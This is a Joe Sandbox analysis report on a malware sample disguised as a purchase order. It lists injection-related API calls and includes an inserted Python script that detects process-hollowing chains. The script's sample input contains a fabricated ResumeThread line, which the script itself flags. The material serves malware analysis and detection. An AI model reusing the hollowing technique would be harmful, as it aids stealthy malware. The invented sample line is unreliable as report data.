                                            • Instruction Fuzzy Hash: 36914071D00229DFEB14DF68C941BEEBBB2FF49314F1485AAE808A7240DB759985CF91

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02C85E69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 1f69393fef268532dbacd3c2da567443fc20489fcdbe021487f8181b4c51b887
                                            • Instruction ID: 5f7ead5571031d6c0d915e8d0d0178d435de603e90b892c96f89202c6fedcac6
                                            • Opcode Fuzzy Hash: 1f69393fef268532dbacd3c2da567443fc20489fcdbe021487f8181b4c51b887
                                            • Instruction Fuzzy Hash: 4341E371C0071DCBDB24DFA9C88478EBBB5BF48708F60815AD408AB255DBB56945CF90

                                            Control-flow Graph

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02C85E69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 322f683c153bdc0ab89509b28fd752e318903728e96fb6663958da79562027aa
                                            • Instruction ID: 071d6eb9651337b0b9e88127af43416f42613ae9e62245cb3f018cc1582f9292
                                            • Opcode Fuzzy Hash: 322f683c153bdc0ab89509b28fd752e318903728e96fb6663958da79562027aa
                                            • Instruction Fuzzy Hash: A541F2B1C00719CFDB24DFA9C884B8EBBB5BF88708F60815AD408AB255DBB56945CF90

                                            Control-flow Graph

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E278D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ac18228a9a92004ed6f79f397c7f9bc006941ae230a21a9899fced31790b8d57
                                            • Instruction ID: eb5cbd6636cf6d74ef3e20b3252a6a539be16073ef6fe1a30c3d1efae8942533
                                            • Opcode Fuzzy Hash: ac18228a9a92004ed6f79f397c7f9bc006941ae230a21a9899fced31790b8d57
                                            • Instruction Fuzzy Hash: 20215A71900319DFDB10CFA9C981BDEBBF5FF48310F148429E958A7240D778A950CBA5

                                            Control-flow Graph
                                            • Blocks: 160 4e27848-4e27896; 162 4e278a6-4e278e5 (WriteProcessMemory); 163 4e27898-4e278a4; 165 4e278e7-4e278ed; 166 4e278ee-4e2791e
                                            • Edges: 160->162, 160->163, 162->165, 162->166, 163->162, 165->166
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E278D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 523e2fbd969c49b59d428abda8c5b34cb82af6525becf94fc19139e686892cb5
                                            • Instruction ID: 7328ad154c990d75b605fad73ec23b3c9d7e6567c551c4ef9f578a424fe1c5a5
                                            • Opcode Fuzzy Hash: 523e2fbd969c49b59d428abda8c5b34cb82af6525becf94fc19139e686892cb5
                                            • Instruction Fuzzy Hash: 6B2136B1900359DFDB10CFA9C981BDEBBF5FF88310F14842AE958A7240D778A950CBA5

                                            Control-flow Graph
                                            • Blocks: 170 4e27930-4e27932; 171 4e27934-4e27936; 172 4e27938-4e279c5 (ReadProcessMemory); 175 4e279c7-4e279cd; 176 4e279ce-4e279fe
                                            • Edges: 170->171, 170->172, 171->172, 172->175, 172->176, 175->176
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E279B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 5fc3692674ab874603b33888e80d32c3eec6c81b34a991e2a97d0121c687b302
                                            • Instruction ID: 0432ccb42472838c73c65d500fd8e5697badfce76e0afd8d559746fc7b90a450
                                            • Opcode Fuzzy Hash: 5fc3692674ab874603b33888e80d32c3eec6c81b34a991e2a97d0121c687b302
                                            • Instruction Fuzzy Hash: 5B2136B18003599FDB10CFAAC881BEEBBF5FF48310F508429E959A7250D738A950CBA4

                                            Control-flow Graph
                                            • Blocks: 186 4e276a9-4e276fb; 188 4e2770b-4e2773b (Wow64SetThreadContext); 189 4e276fd-4e27709; 191 4e27744-4e27774; 192 4e2773d-4e27743
                                            • Edges: 186->188, 186->189, 188->191, 188->192, 189->188, 192->191
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E2772E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 9fdc9b1c080d1fd0cd98c02bbe8abce5e9d3333f28ad1840d3284111878c7f45
                                            • Instruction ID: 53419dd616b6e038dcd56fc4bc050aa6ab3a581da693f37020a9ebfd5ac7a8f6
                                            • Opcode Fuzzy Hash: 9fdc9b1c080d1fd0cd98c02bbe8abce5e9d3333f28ad1840d3284111878c7f45
                                            • Instruction Fuzzy Hash: F2216871D002098FEB10CFA9C4857EEBBF1EF88324F14842AD419A7240DB78A945CFA4

                                            Control-flow Graph
                                            • Blocks: 180 2c8b914-2c8df9c (DuplicateHandle); 182 2c8df9e-2c8dfa4; 183 2c8dfa5-2c8dfc2
                                            • Edges: 180->182, 180->183, 182->183
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8DECE,?,?,?,?,?), ref: 02C8DF8F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a2ad691f19effd604294673eb554f81a5d001ee5fcd4129ca6bf8ca06f2b3f5d
                                            • Instruction ID: a2b6cd8895b96916962e71c8cc8d9e18f836842b1e4f6248f1796011556f0237
                                            • Opcode Fuzzy Hash: a2ad691f19effd604294673eb554f81a5d001ee5fcd4129ca6bf8ca06f2b3f5d
                                            • Instruction Fuzzy Hash: DE2114B5900208EFDB10DFAAD884ADEBBF4FB48324F14841AE918A3350D375A950CFA4

                                            Control-flow Graph
                                            • Blocks: 196 4e276b0-4e276fb; 198 4e2770b-4e2773b (Wow64SetThreadContext); 199 4e276fd-4e27709; 201 4e27744-4e27774; 202 4e2773d-4e27743
                                            • Edges: 196->198, 196->199, 198->201, 198->202, 199->198, 202->201
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E2772E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d7cea8b9d2a6c7fdc02878d561f9b488bac898950f0760d103bbfba9dd70f612
                                            • Instruction ID: a25c7a754128c5b58f4c5b53cc2a7c1dda77fc3ccecd98d70cd1d79b617b1c8a
                                            • Opcode Fuzzy Hash: d7cea8b9d2a6c7fdc02878d561f9b488bac898950f0760d103bbfba9dd70f612
                                            • Instruction Fuzzy Hash: 82214971D003098FDB10DFAAC485BEEBBF4EF88324F148429D559A7240DB78A944CFA5

                                            Control-flow Graph
                                            • Blocks: 206 4e27938-4e279c5 (ReadProcessMemory); 209 4e279c7-4e279cd; 210 4e279ce-4e279fe
                                            • Edges: 206->209, 206->210, 209->210
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E279B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: cfdef9794715f62438922db69be6a86a2d11478c2810293339b16eace7d88675
                                            • Instruction ID: a4eb485ea8a9cf56ceef6d938c743d7cc1420b2ff017c580c84a4ac93d0a7318
                                            • Opcode Fuzzy Hash: cfdef9794715f62438922db69be6a86a2d11478c2810293339b16eace7d88675
                                            • Instruction Fuzzy Hash: F32128B18003599FDB10DFAAC881ADEBBF5FF48310F148429E559A7250D7389550CBA5

                                            Control-flow Graph
                                            • Blocks: 214 4e29ef4-4e2a6ca; 216 4e2a6d6-4e2a706 (EnumThreadWindows); 217 4e2a6cc-4e2a6d4; 218 4e2a708-4e2a70e; 219 4e2a70f-4e2a73c
                                            • Edges: 214->216, 214->217, 216->218, 216->219, 217->216, 218->219
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,04E2A668,03DA4108,02DC4530), ref: 04E2A6F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: fa2047c7f20cd0671e8e03d6fd17955b4c41599a49c0007d677b4f2a0c6cd43b
                                            • Instruction ID: bf65c7a1485cec38296d9d0ece50c5d435f1fc5cc9de1c7be7a30cac28cd75fd
                                            • Opcode Fuzzy Hash: fa2047c7f20cd0671e8e03d6fd17955b4c41599a49c0007d677b4f2a0c6cd43b
                                            • Instruction Fuzzy Hash: 1F2129B19002598FDB10CF9AC944BEEFBF4FB88310F14842AD455A7350D774A944CFA5

                                            Control-flow Graph
                                            • Blocks: 223 4e2a681-4e2a6ca; 225 4e2a6d6-4e2a706 (EnumThreadWindows); 226 4e2a6cc-4e2a6d4; 227 4e2a708-4e2a70e; 228 4e2a70f-4e2a73c
                                            • Edges: 223->225, 223->226, 225->227, 225->228, 226->225, 227->228
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,04E2A668,03DA4108,02DC4530), ref: 04E2A6F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: 6fefb26613470d6ae87b0ff55227deedb8f6af2a2ffedc99412c97557c4378bf
                                            • Instruction ID: 35df8be2dd718e2486f2ee0e16bc422fee42e957d9c8ab083c1e886660f9e894
                                            • Opcode Fuzzy Hash: 6fefb26613470d6ae87b0ff55227deedb8f6af2a2ffedc99412c97557c4378bf
                                            • Instruction Fuzzy Hash: 062127B190025A8FEB14CF9AC985BEEFBF4FB88320F14842AD455A7250D778A944CF65

                                            Control-flow Graph
                                            • Blocks: 232 4e28dc0-4e2abbb; 234 4e2abc3-4e2abc7; 235 4e2abbd-4e2abc0; 236 4e2abc9-4e2abcc; 237 4e2abcf-4e2ac02 (MessageBoxW); 238 4e2ac04-4e2ac0a; 239 4e2ac0b-4e2ac1f
                                            • Edges: 232->234, 232->235, 234->236, 234->237, 235->234, 236->237, 237->238, 237->239, 238->239
                                            APIs
                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,04E293D9,?,?,?), ref: 04E2ABF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Message
                                            • String ID:
                                            • API String ID: 2030045667-0
                                            • Opcode ID: fb360ea089eb6b4478ba8103424d3d562fde2dcccb0866e38ced9acf5d70da85
                                            • Instruction ID: 0080091aa19f23db65ea9813ab48397a53f9a87fb82de2551cf1fc57ecc2ebb5
                                            • Opcode Fuzzy Hash: fb360ea089eb6b4478ba8103424d3d562fde2dcccb0866e38ced9acf5d70da85
                                            • Instruction Fuzzy Hash: C72104B6900359DFDB10CF9AC984ADEFBB5FB48314F14856EE918A7200D375A544CBA4

                                            Control-flow Graph
                                            • Blocks: 241 4e2ab73-4e2abbb; 243 4e2abc3-4e2abc7; 244 4e2abbd-4e2abc0; 245 4e2abc9-4e2abcc; 246 4e2abcf-4e2ac02 (MessageBoxW); 247 4e2ac04-4e2ac0a; 248 4e2ac0b-4e2ac1f
                                            • Edges: 241->243, 241->244, 243->245, 243->246, 244->243, 245->246, 246->247, 246->248, 247->248
                                            APIs
                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,04E293D9,?,?,?), ref: 04E2ABF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Message
                                            • String ID:
                                            • API String ID: 2030045667-0
                                            • Opcode ID: 1cdc4ec0f18903910e08fa7584f6423214cf6a3b6c8487ec46c9a541d5fa775d
                                            • Instruction ID: 92c07f0ae3e76eef9987992ce4065b6068690809ba41e8bbe94396deeebe50a1
                                            • Opcode Fuzzy Hash: 1cdc4ec0f18903910e08fa7584f6423214cf6a3b6c8487ec46c9a541d5fa775d
                                            • Instruction Fuzzy Hash: 122133B6800319DFDB10CF9AD984ADEFBB5FB88314F10842EE818A7600C374A584CFA4
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E277F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 665772e80dd6d6f43ccacc0924b96010f06b2c78d5e7d3c29df79d24a84167a7
                                            • Instruction ID: ddeae5343a82550c5508aa78247c15d11764a51b39b5a95e363386df6b26cddc
                                            • Opcode Fuzzy Hash: 665772e80dd6d6f43ccacc0924b96010f06b2c78d5e7d3c29df79d24a84167a7
                                            • Instruction Fuzzy Hash: 3E1156768003499FEB10DFAAC845BEFBBF5EF88320F248419E519A7250C775A950CFA5
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8BCF9,00000800,00000000,00000000), ref: 02C8BF0A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 3ae2f4415484577e6dad8789721e90bd404546e2fbc95706f64f819bfa711918
                                            • Instruction ID: 2240aa1dbb368707e16d52a3b16d79aab3b5df8261a4884003bced926a26dbe0
                                            • Opcode Fuzzy Hash: 3ae2f4415484577e6dad8789721e90bd404546e2fbc95706f64f819bfa711918
                                            • Instruction Fuzzy Hash: BA1112B69002498FDB10DF9AC844ADEFBF4EB88318F14842EE519A7210C375A945CFA4
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E277F6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c0588bf42667da4430e4bb1fe345fab841ffa1caa2e02cd3ba38baf708cb33dc
                                            • Instruction ID: f6106470c40225c1990eaabfde5b4fdcfff22c11a7f1f4568c0cef162ef75b06
                                            • Opcode Fuzzy Hash: c0588bf42667da4430e4bb1fe345fab841ffa1caa2e02cd3ba38baf708cb33dc
                                            • Instruction Fuzzy Hash: A61134728002499FDB10DFAAC845BDFBBF5EF88320F248419E519A7250CB75A950CFA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 93da277669c22befe76e64b999fd8e9925766e149bb11b5b20ca1a0b90c55f8f
                                            • Instruction ID: e87bc1469da5c235584bf548f80241e9a32b039df418b00738606948f016920e
                                            • Opcode Fuzzy Hash: 93da277669c22befe76e64b999fd8e9925766e149bb11b5b20ca1a0b90c55f8f
                                            • Instruction Fuzzy Hash: 1C1158B18042498FEB20DFAAD8457EEBBF5AB88324F248419D159A7250CB35A940CF94
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: daf52f049c6919a11f5ce3b12f432721ac20a182b9dd3aee267c9f8f136d07a5
                                            • Instruction ID: 09182c7384e84be4bc81fd43fb72e037289e58290ce6f2b695e59a5a6cd7fb12
                                            • Opcode Fuzzy Hash: daf52f049c6919a11f5ce3b12f432721ac20a182b9dd3aee267c9f8f136d07a5
                                            • Instruction Fuzzy Hash: 6F113AB19003498FDB20DFAAD8457DFFBF4EF88724F248419D519A7240CB75A540CB95
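The function records above, taken together, are the process-hollowing chain the report flags (VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread all resolved from the same unmapped 04E20000 region, with ReadProcessMemory and DuplicateHandle alongside). The following is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses "APIs" and "Memory Dump Source" lines in the format shown on this page, groups calls by dump region, and reports whether a region contains a complete hollowing chain. The sample input is constructed from the records above; the ResumeThread line in it is an assumption written in the same format, because this section lists ResumeThread only as an "API ID" with no ref line.

```python
import re
from collections import defaultdict

# Constructed sample: API/Source lines copied from the records on this page.
# The ResumeThread line is ASSUMED (the report shows ResumeThread only as an
# "API ID" here, without a ref line); its ref address is made up.
SAMPLE_REPORT = """\
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E277F6
• Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E278D8
• Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E279B8
• Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E2772E
• Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
• ResumeThread.KERNELBASE(?), ref: 04E27A00
• Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8DECE,?,?,?,?,?), ref: 02C8DF8F
• Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8BCF9,00000800,00000000,00000000), ref: 02C8BF0A
• Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
"""

# "• Api.MODULE(args), ref: ADDR" as printed under each "APIs" heading.
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "• Source File: <dump>.sdmp, Offset: ADDR, ..." under "Memory Dump Source".
SOURCE_LINE = re.compile(r"^(?:•\s*)?Source File:.*?Offset:\s*(?P<offset>[0-9A-Fa-f]+)")

# One stage of the hollowing chain is satisfied by any of these exports; the
# sample resolves most of them through KERNELBASE, one through KERNEL32, and a
# direct-syscall variant would show the Nt* names instead.
HOLLOWING_STAGES = (
    ("allocate", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("hijack", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
)


def parse_api_records(text):
    """Return one dict per API ref line, tagged with the dump region (Offset)
    of the Memory Dump Source line that follows it in the report layout."""
    records, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            pending.append({"api": m["api"], "module": m["module"],
                            "args": m["args"], "ref": m["ref"].upper()})
            continue
        m = SOURCE_LINE.match(line)
        if m:
            for rec in pending:
                rec["region"] = m["offset"].upper()
                records.append(rec)
            pending = []
    return records


def assess_regions(records):
    """Per dump region: which hollowing stages are present, which are missing.
    Membership only: ref addresses are code locations, not call order (note
    Wow64SetThreadContext at 04E2772E sits below VirtualAllocEx at 04E277F6)."""
    by_region = defaultdict(set)
    for rec in records:
        by_region[rec["region"]].add(rec["api"])
    verdicts = {}
    for region, apis in by_region.items():
        stages = {name: sorted(apis & exports) for name, exports in HOLLOWING_STAGES}
        missing = [name for name, found in stages.items() if not found]
        verdicts[region] = {"apis": sorted(apis), "stages": stages,
                            "missing": missing, "complete": not missing}
    return verdicts


if __name__ == "__main__":
    for region, v in assess_regions(parse_api_records(SAMPLE_REPORT)).items():
        state = "COMPLETE hollowing chain" if v["complete"] else f"partial, missing {v['missing']}"
        print(f"region {region}: {state}; APIs {v['apis']}")
```

Run against the constructed sample, region 04E20000 comes back as a complete chain and region 02C80000 (DuplicateHandle, LoadLibraryExW) as no chain at all; drop the assumed ResumeThread line and 04E20000 degrades to "missing resume", which is exactly what this section on its own supports. The grouping key is the dump Offset because the report ties each function to the unmapped region it was lifted from ("based on PE: false"); that co-occurrence is the signal, not the KERNELBASE/KERNEL32 module name, which only records where the export resolved.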
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 04E2B01D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 577937b2b36be4b0a334d3ed9cc8599796632a3b6cfd34333fed792d5889e078
                                            • Instruction ID: 893b002c3791ad51988d0baae388b8219f0857b7b6db6febf6e0263d651625e4
                                            • Opcode Fuzzy Hash: 577937b2b36be4b0a334d3ed9cc8599796632a3b6cfd34333fed792d5889e078
                                            • Instruction Fuzzy Hash: A51110B5800249DFDB10CF9AD989BDEBFF8EB48320F14841AE558A7210D375A994CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 04E29DAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: a5dbd4200b44e678181875abd269f98e45a941345ab7522a929543051a2cfaa1
                                            • Instruction ID: 309b2cca795d8246de210b3bfe0551ba7c01fcd9fc4df84f7d207d3f38b9c60e
                                            • Opcode Fuzzy Hash: a5dbd4200b44e678181875abd269f98e45a941345ab7522a929543051a2cfaa1
                                            • Instruction Fuzzy Hash: 2A1133B1900348CFDB20DFAAD485BCEBBF4EB48324F24845AD518A7200D375A584CFA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8BC7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2164372197.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2c80000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: be5c742fb41af0a101ba1e4bc742400822fa5b6302a131c809f0b4b00afbc791
                                            • Instruction ID: ededc542e3e9b1f3492b22affa4c31b281753c2f9a8f138ea271fa7fac210428
                                            • Opcode Fuzzy Hash: be5c742fb41af0a101ba1e4bc742400822fa5b6302a131c809f0b4b00afbc791
                                            • Instruction Fuzzy Hash: B61110B5C007498FDB20DF9AC444ADEFBF4EB88228F10841AD519B7210C779A945CFA1
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 04E29DAD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2167665332.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4e20000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: d971fcde34e48e672c516d0e4f0ccc131254e9eb5ee132594ef23837db13a575
                                            • Instruction ID: 21d91616e0eff3262b484e1131d2ec87eab77342ff18b863616f710d14f2e4bd
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                            • Instruction ID: 5885d6f4033669adf81aa400cb90fc1c70f486e857f7de6c3d6bc2b7d181aee5
                                            • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                            • Instruction Fuzzy Hash: 8F118B75504284DFCB15CF10D5C4B15BBA1FB84218F24C6A9D88A4B696C37AD44ACB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1994e16e4d0d46459624894a38b305d865417c401bbad3bd0eee660096fc0591
                                            • Instruction ID: eb6bbdd8aa801587a830f037438dd52a324a8dc803912738c7535ae1e788c09a
                                            • Opcode Fuzzy Hash: 1994e16e4d0d46459624894a38b305d865417c401bbad3bd0eee660096fc0591
